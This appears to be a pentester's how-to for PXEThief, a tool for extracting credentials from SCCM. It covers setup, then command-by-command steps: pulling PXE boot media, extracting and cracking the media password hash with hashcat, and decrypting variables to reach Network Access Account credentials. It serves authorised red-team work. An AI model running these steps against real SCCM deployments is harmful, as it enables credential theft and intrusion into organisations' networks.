# pxethief
pxethief helps you get creds out of SCCM.
INFO
Good news! I've got good success getting pxethief to run on Linux by following these steps. First, get the proper

```shell
git clone https://github.com/MWR-CyberSec/PXEThief.git
cd PXEThief
git fetch origin pull/11/head:pr-11
git checkout pr-11
```
Then I found this works pretty well for getting it rocking in a venv:

```shell
python3 -m venv venv
source venv/bin/activate
sudo venv/bin/python3 -m pip install -r requirements.txt
sudo venv/bin/python3 pxethief.py
```
# Install

Get the 64-bit Python installer from python.org, then install the requirements:

```shell
pip install -r requirements.txt
```
I'm having this issue.
# General enumeration - automatically download encrypted media file using DHCP PXE

```shell
pxethief.py 1
```
# Target a specific MECM DP

```shell
pxethief.py 2 1.2.3.4
```
TIP

For automatic exploitation to happen, you need to have the TFTP client installed on Windows:

```powershell
Enable-WindowsOptionalFeature -FeatureName TFTP -Online
```
# Identify hash of the password that was used to encrypt the variables

```shell
pxethief.py 5 boot.var
```

Note: `boot.var` is a file you might find in the `\\SCCMSERVER\REMINST\SMSTEMP` folder.
# Crack the extracted hash

I found it easier to use the hashcat-6.2.6-SCCM version of hashcat, and then use this syntax:

```shell
hashcat-6.2.6-SCCM.exe -m 19850 hash.txt bigbadwordlist.txt
```
# Decrypt and retrieve contents of the media variables file (if cracking was successful)

```shell
pxethief.py 3 somevariablesfile.var YOUR-CRACKED-PASSWORD-GOES-HERE
```

At this point you should be able to get a certificate that will be used to request SCCM policies and task sequences, which may have the NAA or other creds.
TIP

I sometimes have a heck of a time getting this attack to work, but I opened a GitHub issue that helped me. I also had a situation where the decryption routine seemed to work and I got a funky `UnicodeDecodeError: 'utf-16-le' codec can't decode bytes in position 236-237: illegal encoding` error. I opened an issue for this and the fix ended up being to comment/uncomment some lines following this guidance and then setting `USING_TLS` to `False` in the script:

```python
USING_TLS = False  # HTTPS and client certificate support
```